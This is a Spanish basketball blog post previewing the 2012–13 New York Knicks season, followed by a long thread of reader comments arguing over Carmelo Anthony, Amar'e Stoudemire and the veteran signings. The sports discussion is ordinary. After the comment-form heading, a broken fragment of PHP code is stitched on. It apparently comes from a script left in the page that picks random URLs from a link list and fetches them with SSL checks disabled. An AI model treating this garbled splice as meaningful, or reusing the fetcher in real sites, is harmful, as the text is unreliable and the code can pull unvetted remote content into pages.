New York Knicks: Sin novedad en el frente

16 de October de 2012 por HisRoyalAirness
¡Bienvenidos al mayor espectác…despropósito del mundo! Jimmy Dolan y sus New York Knicks.

El mayor mercado de la liga lleva 15 años sin construir un equipo que realmente aspire a algo. No es por falta de fondos, falta de reclamos geográficos o falta de afición, es por absoluta incompetencia, sea la culpa de un Isaiah Thomas, de un Dolan o de quien tenga la batuta. Los seguidores knickerbockers merecen algo más. Es evidente que las cosas han mejorado respecto a hace 5 años pero este verano, en vez de completar la plantilla rodeando a las piezas aprovechables con cierto sentido, la directiva se ha dedicado a incorporar jugadores sin ton ni son.

El activo más valioso de la franquicia es, y debería seguir siendo, Carmelo Anthony. El objetivo evidente debería ser rodearle de un equipo a su medida y no ir pescando lo que se pueda en el mercado veraniego. Melo es, con mucho, el mejor jugador del equipo y uno de los mejores de toda la liga. Junto a Kobe y Durant es el mejor anotador del campeonato y uno de los hombres con más recursos en el poste gracias a su técnica y rapidez de pies. Siempre se le ha achacado una cierta dejadez defensiva y el hecho de compartir clase de draft con Lebron James y jugar en su misma posición no le ha beneficiado. El último año se le ha visto más madurez y, por momentos en la serie contra Miami, una defensa al hombre y fundamentos tácticos más que buenos. Seamos serios, ¿alguien se atreve a echarle la culpa de la situación en la Gran Manzana a Anthony? Muchos periodistas sí lo hacen y yo me pregunto: tan pronto se olvida que los 20 millones anuales que eran para James los está cobrando Stoudamire? 

Al margen de la locura/estupidez del “efecto Lin” no creo que se haya cometido un error al no renovarle. Un jugador que no ha disputado ni 30 partidos como profesional es una inversión cuanto menos arriesgada. Cierto es también que fichar en su lugar a 2 individuos que pasan los 35 -uno de los cuales ni se ha estrenado en norteamérica- es para echarles a los leones. Además 5 millones al año por Lin tampoco era una barbaridad. En fin, una de cal y otra de arena.

Dicho esto el año se presenta, de nuevo, sin el más mínimo atisbo de opción al título. Parece una afirmación muy radical tras comprobar los nombres que figuran en el roster pero si nos fijamos con atención no existe una mejoría REAL con respecto al año pasado. Las carencias siguen siendo las mismas: defensa, definición de roles, rebote, opciones ofensivas y la falta de química de la dupla de forwards. A todo esto hay que añadir además que la Atlantic Division se ha convertido  posiblemente en la más competitiva: los siempre correosos Celtics con Rondo a la cabeza, los “nuevos” y jóvenes Sixers (presumiblemente con Bynum campando a sus anchas por la Conferencia Este), la incógnita de los renovados y millonarios Nets y el nuevo proyecto de los Raptors. Va a haber que ganarse las habichuelas con mayor ímpetu que antes.

Sin más dilación vamos a analizar el quinteto incial y sus posibles variaciones, sin entrar a analizar a todo quisque.

PG: Ray Felton/ Jason Kidd

Lo lógico sería que Felton dejase de ir a desayunar al Kentucky Fried Chicken y partiese como indiscutible titular. Ya demostró en los inicios de la era “Amar’e pre-Melo” que talento le sobra y rozó numerazos de All-Star. Como nadie puede asegurar que se mantenga en forma siempre estará en la recamara la fiabilidad de Jason Kidd que a sus 38 años años garantiza eficiencia y minutos de calidad. Aún no entiendo la finalidad de tener a Prigioni en la plantilla y no creo que disfrute de muchos minutos.

SG: J.R. Smith / Iman Shumpert

A pesar de que el abuelo Kidd va a jugar muchos minutos de 2, lo lógico es pensar que quien debiera ser de la partida es JR Smith tanto por físico como por capacidad anotadora. El de North Carolina es un fiable tirador y garantiza unos 10 puntos por noche e intensidad más que aceptable.

El sophomore Iman Shumpert aún tiene que recuperarse de su desgarro del ligamento cruzado anterior y hasta el 2013 no le veremos pisar el parqué pero con la marcha de Landry Fields y dadas las buenas sensaciones que dejó en su primer año puede hacerse con un papel importante en la rotación.

SF: Carmelo Anthony

Tras el “Melo-drama” del pasado año las aguas parecen bajar más mansas y el ambiente parece haberse calmado.

Talento a raudales, físico, precisión e instinto asesino; el de Brooklyn lo tiene todo. La temporada anterior cumplió cuando se le exigió y lideró al equipo en todo momento, sin dar un partido por perdido. Es injusto decir que en la serie contra Miami James le ganó la partida puesto que el de los Knicks atraía a toda la defensa rival. Precisa como el comer de compañeros que provoquen dobles marcajes de vez en cuando para liberarle de presión y crear desajustes en ataque (como Lebron precisa de Wade o Durant de Westbrook).

Pese a lo que digan todos sus críticos y detractores es un anotador imparable, con una versatilidad sólo comparable a la de Bryant. Además de irse facilmente por encima de los 25 puntos por velada se infravalora su capacidad y agresividad reboteadora, cosa que en playoffs y finales ajustados saca a relucir.

Todo girará a su alrededor, como debe ser, y su éxito dependerá  en gran medida de su compenetración con quien juegue de base y, sobre todo, con el individuo que nos ocupa a continuación.

PF: Amar’e Stoudemire

La indolencia personificada. La nulidad defensiva. Tras 10 años en la liga le ha dado por tomar clases con Hakeem “The dream” para mejorar su juego en el poste ¿En serio? ¿Antes no lo consideraba necesario? Decía el gran Sir Charles en NBA.TV que le cabreaba mucho que los jugadores no se preocupasen de estas cosas al principio de su carrera y que ahora parece populismo barato. Estoy totalmente de acuerdo.

Amar’e tiene un físico excelente, un buen tiro de media distancia y talento suficiente. Pero en el momento en que sólo los empleas en la regular season y te dedicas a mirar en los Playoffs – a no ser que Nash te colme de presentes- vas a estar siempre en el disparadero. Más si cobras lo que cobras.

Lo más preocupante es su absoluta inoperancia defensiva que condiciona toda la dinámica del equipo y carga de trabajo excesivo a Chandler, el cual el año pasado tenía problemas de faltas noche sí y noche también.

Si quieren ser un equipo a tener en cuenta Stat DEBE defender, no hay más. Yo lo traspasaría sin dudarlo pero siempre que empieza la temporada le doy una oportunidad y pienso que puede cambiar de actitud. Luego se pierde una serie de Playoffs por darle un puñetazo al cristal de un extintor y ya no hay más que decir.

C: Tyson Chandler

El ¿merecido? jugador defensivo del pasado año es una pieza fundamental para estos dispersos Knicks. Pívot defensivo y disciplinado que asume su rol y trabaja duro. Lidera en defensa e imprime mentalidad y garra en la cancha, cosa muy necesaria dada la facilidad para dejarse llevar de sus compañeros.

Habrá que tener en cuenta también a Steve Novak, uno de los mejores triplistas del torneo y que al parecer ha entrenado muy duro este verano. La incorporación de Marcus Camby sería buenísima…hace 7 años. Ahora tiene 38 y ya no es el que fuera jugador defensivo del año en 2007 pero puede dar unos buenos minutos de descanso a Amar’e. Atentos también al rookie Copeland. A hecho una gran liga de verano y en pretemporada está teniendo buenos minutos.

Por último, por si la media de edad no fuese ya excesiva, se ha incorporado a la disciplina el rey de la technical foul, el loco “Sheed” Wallace, que vuelve del retiro para ver si puede seguir siendo útil. Si las incorporaciones de Wallace, Kidd y Camby hubiesen sido en el 2002 estaríamos hablando del mejor equipo de la historia por lo menos, ¿no? A ver qué tal les sale la jugada y esto no se convierte en una enfermería sobresaturada.

Quinteto inicial: Raymod Felton, JR Smith / Jason Kidd, Carmelo Anthony, Amar´e Stoudamire, Tyson Chandler.
6º hombre: Steve Novak

Altas: Chris Copeland, Jason Kidd, Marcus Camby, Pablo Prigioni, James White, Ronnie Brewer, Kurt Thomas, Raymond Felton, Rasheed Wallace.
Bajas: Landry Fields, Jared Jeffries, Jeremy Lin, Toney Douglas, Josh Harrellson, Dan Gazduric, Jerome Jordan, Baron Davis, Mike Bibby

Previsión: alrededor de 45 victorias, 4º o 5º del Este. Dependiendo de los cruces, primera o segunda ronda.

Comenta

32 comentarios a esta entrada

  1. HisRoyalAirness dice:
    #1

    Chicos, se ha colado un par de veces Amaré en vez de Amar`e. Aún os vais a pensar que le quiero (lo dudo)

      Citar

  2. M dice:
    #2

    Comparto el tono general del artículo, aunque situaría en un escalón (sólo uno) a Carmelo. Es muy bueno, pero su influencia en sus compañeros suele ser baja. Creo que lo que le difernecia de James no es un wade, sino su IQ. Dicho esto, no creo que nadie pudiera hacer mucho con el equipo que tiene en torno a él. Y que comerse a Amare tras tirar años de planificación modesta pero sensata, les ha machacado el futuro. No sé si tiene arreglo…pero lo dudo, a corto plazo.

      Citar

  3. M dice:
    #3

    En un escalón más bajo, quería decir, sorry.

      Citar

  4. GreenPride dice:
    #4

    Gran análisis de HisRoyal.
    Un equipo que no ha mejorado en nada respecto a su proyecto del año pasado y que a priori parece anclado en ser equipo de Playoffs pero si poder dar un paso más.
    La clave del equipo es sin duda Carmelo. El año pasado los llevo adelante casi en solitario en tareas ofensivas y visto lo visto es más que posible que vuelva a tener que hacer lo mismo este año. Felton ayudará en el puesto de base y yo creo que hicieron muy bien en no jugarse la pasta por Lin. Lo malo han sido el resto de incorporaciones de las que sólo Brewer parece en edad de aportar algo
    Sheed, Prigioni, Kidd, Kurt Thomas, Camby??? 5 jugadores que hace mucho que pasaron sus mejores años todos juntos a la vez? Incluso si las lesiones les respetaran su nivel de juego ya no es el que fue un día ni se parece. Si les hubieran juntado hace 7 u 8 años serían aspirantes al anillo, hoy son más bien aspirantes al partido de leyendas. Fichar a uno o dos para dar experiencia hubiera sido entendible pero a los 5 parece una broma pesada.
    Y luego queda por supuesto el tema Amar`e. Un jugador que parecía destinado a dominar desde el puesto de 4 en sus inicios en Phoenix y que ahora parece más centrado en vivir la vida neoyorkina que en jugar a baloncesto de forma seria. Buen tiro y gran físico, pero poca actitud y nada de defensa. Si no cambia será la tumba de estos Knicks. Haría bien en mirar a su compañero Chandler que con muchas menos condiciones para el basket es más importante para su equipo. Todo un currante que tendrá trabajo a destajo para suplir las carencias defensivas de gente como Felton, JR, Amare o Novak y los achaques de sus ilustres compañeros.
    En definitiva que si un trade milagroso no lo arregla veo a estos Knicks en mitad del Este, más bien 5º o 6º puesto y fuera en primera ronda ya que no les veo ganando unas series a Nets, Pacers, Celtics o Heat. Sigue la travesía del desierto en la Gran Manzana

      Citar

  5. GreenPride dice:
    #5

    Por cierto, sólo una cosa Carmelo es un gran anotador y dice HisRoyal que sólo comparable a Durant o Kobe hoy día. Creo sinceramente que habría que meter a LeBron aquí aunque es mucho más que un anotador puede competir con los otros 3 en meter puntos sin ningún problema.

      Citar

  6. Denise dice:
    #6

    Equipo sin opciones de anillo, pero que todavía le da para optar a jugar la Final del Este contra los Heat. Depende de como comience la temporada, me plantearía la posibilidad de darle puertas a Amare y JR y luchar por traer a Al Jefferson o a DeMarcus Cousins si este empieza a patalear por salir de los Kings.

    En fin, que si Melo quiere ganar anillos como los de su Draft Lebron, Wade, Bosh y ..MIlicic; debería ser el escudero de alguien o que lo rodeen mucho mejor.

    Con lo bien que jugaban los Knicks con Chandler, Mozgov y Gallinari !!

    De tu analisis, lo que no comparto es que pongas como contender de los Knicks a los Raptors. Creo que los dinosaurios ni olerán playoffs,

    Pronóstico: Cabeza de serie del Este, eliminado en semis o en la final del Este

      Citar

  7. HisRoyalAirness dice:
    #7

    2 cosas:

    Green, hablo de anotador con más recursos, no de la capacidad de anotar a secas. Está claro que James tiene números parejos, e incluso mejores, pero, aunque haya mejorado su juego en el poste, Carmelo como anotador lo tiene todo. En mi opinión Kobe y él son los más completos en ese aspecto.

    Denise, en ningún momento pongo como contender de los Knicks a los Raptors, no estoy tan mal de la cabeza. Digo que la división atlántica está más competida y eso influye en porcentaje de victorias y agotamiento. Por supuesto que los Knicks son muy superiores

      Citar

  8. Denise dice:
    #8

    Si es verdad, lo interpreté mal, está claro que es la División del Este de mayor nivel; y una de las 3 mas complicadas de la liga junto la Suroeste y la Noroeste.

      Citar

  9. GreenPride dice:
    #9

    HisRoyal, Lo siento pero en lo de Melo y James en ataque no lo veo como tú. Para mí James es mejor penetrador (el mejor de hoy día de largo) y algo peor en tiro exterior. En el poste son parecidos. Para mí, muy igualados en recursos para anotar. No soy un amante de la estética de James pero creo que no tiene nada que envidiar a Melo.
    Aparte de esto y sin tener nada que ver con sus recursos como anotador puro James es muchísimo mejor pasador.
    Denise, yo no les doy ninguna opción de finales del Este. Para mí son claramente inferiores a Boston e Indiana (Heat aparte claro) y veo difícil que ganen a los Nets. Para mí, una temporada con nota buena sería caer en segunda ronda. Mas allá de eso sería una gran sorpresa.

      Citar

  10. lost dice:
    #10

    Pues para mí han mejorado, como mínimo en sensaciones. En primer lugar Melo y Amare hacen por fin una temporada en condiciones juntos, y con un entrenador que no sea un incompetente como Pringles. Mantienen el bloque, y suman jugadores de rol como Kidd, Camby o Brewer(que creo que se te ha olvidado en el análisi como suplente/titular en SF/SG), y un Felton que quién haya visto los partidos de preseason verá que está mucho mejor físicamente de lo que parece. Si Woodson consigue que Amare defienda, se le ve ágil en los entrenamiento, motivado, y que Novak y JR aporten con regularidad desde el banquillo, este equipo me parece muy potente.

    Pronóstico: Primeros de la Atlantic. Semis del Este/Final del Este(si no les toca Miami en las semis)

      Citar

  11. lost dice:
    #11

    Green, inferiores a Indiana? Creo que no, en los partidos de la RS del año pasado cuando llegó Woodson les metieron unas palizas de libro, y luego perdieron en Indiana porque llegaron muertos al último cuarto. Indiana se quedará en Semis, como mucho, y si tienen un hipotético cruce con NY o BKN pondría el dinero en los neoyorkinos seguro

      Citar

  12. melo15 dice:
    #12

    No coincido en casi nada de este analisis, para empezar las incorporaciones de Kidd y Camby si son muy importantres, el primero todos sabemos quien es no? no pide mucha importancia , buen defensor y en playoffs aportara veterania y galones y el segundo es capaz de darle 10 minutos de descanso a Chandler segurisimo asi que yo lo veo una buena incorporacion. Los demas (Prigioni, Thomas, Wallace..) esta ahí de adorno y dudo que jueguen mucho.
    Felton tambien me parece una buena incorporacion, sobretodo porque juega bien el pick & roll.
    En lo unico que coincido es en lo de Melo, siempre criticado y en mi opinion des de que esta en los Knicks esta haciendo lo que puede y mas.
    La pieza clave de esta plantilla es sin duda Stoudmire, con el al 80% de lo que fue en el 2011 los Knicks son Finalistas de Conferencia, sin el llegaran a Semifinales.

      Citar

  13. melo15 dice:
    #13

    Evento historico ayer en la Gran Manzana, Brook Lopez cogio 11 rebotes!!!

      Citar

  14. TheDeerHunter dice:
    #14

    Hoy hace tres años que se fue Andres Montes.

      Citar

  15. nba dice:
    #15

    Dia de infausto recuerdo al margen,
    respecto al analisis la clave es si Melo , no Melo15, hace lo mismo que en el team-usa en la Olimpiadas, o sea ser un finalizador, sino es asi Amar’e se morira de asco,
    Felton en teoria sera el titular, pero siempre va a mantener su nueva forma o sea formato albondiga, a no ser que la parienta le ponga a regimen. Kidd tiene la suficiente jerarquia en la liga para llegado el caso, poner firme a Melo
    Los aficionados a rezar porque esta vez sea la vencida, yo creo que acabaran 5 del este

      Citar

  16. Denise dice:
    #16

    lost: En primer lugar Melo y Amare hacen por fin una temporada en condiciones juntos, y con un entrenador que no sea un incompetente como Pringles.

    Por favor que alguien me explique eso de Pringles…

      Citar

  17. Esteban dice:
    #17

    No comparto en lo mas minimo

    Cual es el problema de traer a 5 tios de entre 35 y 40 años si ninguno de ellos va a ser titular, y prigioni y wallace en principio apenas verian m$inutos y kurt thomas va a dar 6 u 8 minutos de faltas y defensa

    Kidd fue base titular y campeon hace dos años y su rendimiento no va a caer demasiado, viene de ser titular en un equipo de PO, ver solo su edad es de necio

    ahora me entero q camby es muy viejo, y? Viene de ser pivot titular la ultima temporada y como recambio es un lujo total

    Shumpert sera el 2 titular, es un defensor de elite

    Y una banca con kidd, smith, novak y camby tiene los roles muy bien marcados

    En fin, estoy en lineas generales, totalmente en desacuerdo con el analisis

      Citar

  18. Esteban dice:
    #18

    Melo es historico q brook haya bajado 11 rebotes, pero mas historico es que los b aje el partido siguiente a bajar 9

    Sera un cambio de actitud de brook?

      Citar

  19. rumbero dice:
    #19

    Esteban:
    No comparto en lo mas minimo

    Cual es el problema de traer a 5 tios de entre 35 y 40 años si ninguno de ellos va a ser titular, y prigioni y wallace en principio apenas verian m$inutos y kurt thomas va a dar 6 u 8 minutos de faltas y defensa

    Kidd fue base titular y campeon hace dos años y su rendimiento no va a caer demasiado, viene de ser titular en un equipo de PO, ver solo su edad es de necio

    ahora me entero q camby es muy viejo, y? Viene de ser pivot titular la ultima temporada y como recambio es un lujo total

    Shumpert sera el 2 titular, es un defensor de elite

    Y una banca con kidd, smith, novak y camby tiene los roles muy bien marcados

    En fin, estoy en lineas generales, totalmente en desacuerdo con el analisis

    Estarás más o menos de acuerdo en llamarles abueletes, pero el análisis viene a decir lo mismo que tú en lineas generales.
    De Prigioni:”Aún no entiendo la finalidad de tener a Prigioni en la plantilla y no creo que disfrute de muchos minutos.”
    De Kidd: “siempre estará en la recamara la fiabilidad de Jason Kidd que a sus 38 años años garantiza eficiencia y minutos de calidad”.
    De Camby: “Ahora tiene 38 y ya no es el que fuera jugador defensivo del año en 2007 pero puede dar unos buenos minutos de descanso a Amare”

    Yo coincido bastante con el análisis. Para mi la clave de este equipo sigue siendo la compatibilidad ya debatida 1000 veces entre Carmelo-Amare. Ese es el techo del equipo, si no sacan lo mejor de los dos lo tienen realmente difícil por mucho que complementen los veteranos de guerra. Estamos en lo de siempre con los Knicks a principio de temporada…”a ver si Melo es el de los JJOO” y “a ver si se notan los entrenos de Amare y la influencia de Kidd y Felton”. Pues eso…veremos. Yo no tengo demasiada fe aunque me gustaría que me callasen la boca. Les doy del 3º al 5º y semifinales de conferencia como mucho

    Por cierto, hoy Manute Bol hubiera cumplido 50 añitos. Otro recuerdo para él.
    @Denise: Pon “D’Antoni pringles” en Google y lo verás

      Citar

  20. Denise dice:
    #20

    Denise: Pon “D’Antoni pringles” en Google y lo verás

    Jaja que mamones.. Pero me gusta mas Mr Potato Brown y John Carrey Carlisle

      Citar

  21. Vader dice:
    #21

    Para resumir, totalmente de acuerdo con los dos post de lost. Dejo un par de cosas de cosecha propia (aunque algunos ya las habeis mencionado):

    – Brewer creo que puede aportar mucho. Defensor muy atletico. Cuando vuelva Shumpert la defensa de Knicks puede ser terrible.

    – Temporada entera con Woodson, el equipo tendra nivel defensivo NBA.

    – La posición de base se ha solucionado muy bien. Felton viene de su única temporada mala NBA. Hay darle confianza y parece que ha vuelto bien de forma. Él mismo ya lo anticipo con unas declaraciones al fichar por Knicks.

    – El equipo puede aspirar, segun los cruzes, a la final del Este como mucho. Para aspirar a la final de la NBA sentendrian que dar demasiadas cosas que a dia de hoy son una incognita. Este es un proyecto de 2 años.

    – Para aspirar a altas cotas haria falta un Melo de 25ppp + Stat de 20-10 + Felton de 15ppp + 8 app. Muy difícil…

    – Haran una gran regular, pueden ser la “sorpresa” de la temporada. Hay verdaderos recursos saliendo desde el banquillo, jugaran una gran defensa y tienen muchas opciones ofensivas: Melo, Stat, Felton, JR Smith, Novak… (En eso difiero del análisis).

    Ya iré comentando más cosas.

    Saludos y go Knicks!!!

      Citar

  22. HisRoyalAirness dice:
    #22

    O sea Melo, no coincides en nada…salvo en lo de Melo porque le doro la píldora? jaja
    He intentado ser objetivo y por supuesto dar MI opinión.
    No he infravalorado lo que pueden aportar los veteranos, como apunta muy bien Rumbero, simplemente he puesto en duda que si se quiere ser un equipo serio, un “contender” tu rotación no puede nutrirse de semi-cuarentones porque al llegar la hora de la verdad están hechos un guiñapo o lesionados.
    Esteban, hablas muy de memoria con lo de Kidd, que fue base titular y no bajará su rendimiento, sabes lo que supone un año en el físico de un deportista de esa edad?
    Y que lo de ver “sólo” la edad es de necio en fin, para empezar, no lo he hecho ya que he enumerado las virtudes de todos y voy a obviar el insulto por no meterme en una guerra dialéctica.
    Y decir que Shumpert es un defensor “DE ÉLITE” habiendo jugado 1 año en la liga pues me parece un absurdo no, lo siguiente.

    Por lo demás se agradecen mucho las opiniones, todas, es lo bueno de este blog

      Citar

  23. simon dice:
    #23

    jejeje sabia que en el momento que llegara este análisis iba a pasar lo que pasa siempre… y es que no hay mas ciego que el que no quiere ver…
    Y si… Y si… Y si… podremos optar.
    y así… vivieron felices y se comieron los mocos por los siglos de los siglos…

      Citar

  24. HisRoyalAirness dice:
    #24

    Por cierto, quería hacer un apunte sobre lo de Brewer.
    No se me coló, ya veis que lo pongo en el apartado de altas pero es el jugador cuyo rol tengo menos claro. Sí, supongo que disputará muchos minutos de 2 pero no lo tenía lo suficientemente claro y, antes que opinar sobre algo que no tengo del todo claro, prefiero evitarlo

      Citar

  25. 1899 dice:
    #25

    HisRoyalAirness: O sea Melo, no coincides en nada…salvo en lo de Melo porque le doro la píldora? jajaHe intentado ser objetivo y por supuesto dar MI opinión.No he infravalorado lo que pueden aportar los veteranos, como apunta muy bien Rumbero, simplemente he puesto en duda que si se quiere ser un equipo serio, un “contender” tu rotación no puede nutrirse de semi-cuarentones porque al llegar la hora de la verdad están hechos un guiñapo o lesionados.Esteban, hablas muy de memoria con lo de Kidd, que fue base titular y no bajará su rendimiento, sabes lo que supone un año en el físico de un deportista de esa edad?Y que lo de ver “sólo” la edad es de necio en fin, para empezar, no lo he hecho ya que he enumerado las virtudes de todos y voy a obviar el insulto por no meterme en una guerra dialéctica.Y decir que Shumpert es un defensor “DE ÉLITE” habiendo jugado 1 año en la liga pues me parece un absurdo no, lo siguiente.Por lo demás se agradecen mucho las opiniones, todas, es lo bueno de este blog

    Pero no obvies el insulto hombre, contestale con algo mas que “absurdo”

    Asi nos distraemos un poco…

      Citar

  26. lost dice:
    #26

    Yo de los Knicks me espero una primera posición en la Atlantic, o muy cerquita de los Celtics. Para mí, la clave de estos Knicks es Felton. Con Felton, Amare batió todos sus números, primer jugador Knick en anotar más de 30ppp en 7 partidos seguidos, un pick and roll alucinante… Solo veo a Amare renacer a manos de Felton o de Nash, los con que mejor a compenetrado.
    Respecto a las altas en el equipo, yo creo que es el modelo que quiere Woodson. Este equipo está hecho para jugas PO. Woodson quiere a un base que le de calma en momentos de tensión en vez de jugar con Mike Bibby o Toney Douglas, jugadores veteranos que no supongan un riesgo en los PO, que sepas que la pueden jugar. Aunque está por ver como llega Wallace, él dice que viene a sumar, pero yo tengo mis dudas de su forma. Tengo poca fe en que este equipo haga una gran RS muy muy buena, pero el potencial está ahí. Para mí, la cosa está en la segunda unidad:
    Felton-Shumpert-Carmelo-Amare-Tyson
    Kidd-JR Smith-Brewer-Thomas/Wallace-Camby
    Miami está por encima, puede que Boston también(pero a los Celtics les da igual quedar primeros que octavos, saben que tendrán que jugar contra los Heat para ganar) y no veo a nadie más por encima. Los Pacers harán una muy buena RS, están para mí en la división más ‘sencilla’ de la NBA, y saben que sus opciones están en quedar segundos/terceros para poder hacer algo en PO, son un equipo sólido y eficiente, pero en los momentos calientes la cosa cambia. Y los Nets… me generan algunas dudas, demasiada poca defensa, pero calidad a raudales. Me encantarían unas semis de Conferencia: Heat-Nets y Celtics-Knicks, como lo disfrutaría!

    Por cierto, los Knicks aún no han cerrado la plantilla, suenan Barbosa, Redd, Howard y K.Martin.

      Citar

  27. lost dice:
    #27

    Mirad el partido contra los Raptors el viernes, primero de Amare en preseason.

      Citar

  28. Vader dice:
    #28

    Jur, eso no me lo pierdo, hace poco me pille league pass pero aún no he visto ningún partido… sólo un ratillo del Knicks – Celtics…

      Citar

  29. nanoke dice:
    #29

    como gran seguidor de knicks uno año mas dependeremos del aporte de amare y de como llegemos a plyoffs en cuanto a lesiones, porque no olvidemos que dos años de PO y dos años que hemos llegado con 3 o 4 casi jugadores titulares lesionadoso o mas que tocados.

    año pasado, amare (espalda y la mano), chandler jodido, baron, shumpert, lin, etc etc, miami con el equipo al completo, nos hubieran ganado igualmente? pues igual si o igual no pero lo que esta claro que si este equipo no estan todos al 100% no pasan de primera ronda.

      Citar

  30. HisRoyalAirness dice:
    #30

    nanoke:
    como gran seguidor de knicks uno año mas dependeremos del aporte de amare y de como llegemos a plyoffs en cuanto a lesiones, porque no olvidemos que dos años de PO y dos años que hemos llegado con 3 o 4 casi jugadores titulares lesionadoso o mas que tocados.

    año pasado, amare (espalda y la mano), chandler jodido, baron, shumpert, lin, etc etc, miami con el equipo al completo, nos hubieran ganado igualmente? pues igual si o igual no pero lo que esta claro que si este equipo no estan todos al 100% no pasan de primera ronda.

    Sí, habrían ganado igualmente. Tengo una certeza plena. Miami también tuvo a Wade lesionado toda la temporada

      Citar

  31. Vader dice:
    #31

    Yo creo que la gran diferencia de este año respecto a los pasados es que tenemos un EQUIPO con todas las posiciones cubiertas, jugadores de banquillo que aportan y buenos defensores dentro y fuera.

    Como mínimo segunda ronda y espero que lleguemos a final de conferencia contra Miami.

    Saludos

      Citar

  32. Jabho dice:
    #32

    Coincido en que Amare es un cáncer para este equipo. Es vital quitárselo de encima para aspirar a algo serio. Para Rs puede valer, pero si de verdad quieres aspirar a algo en Play Off debes defender muy duro.

    Los Kidd o Camby son buenas incorporaciones, pero las aspiraciones reales pasan por Shumpert vuelva bien (Jr mejor saliendo desde el banco) y un buen traspaso de Amare…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>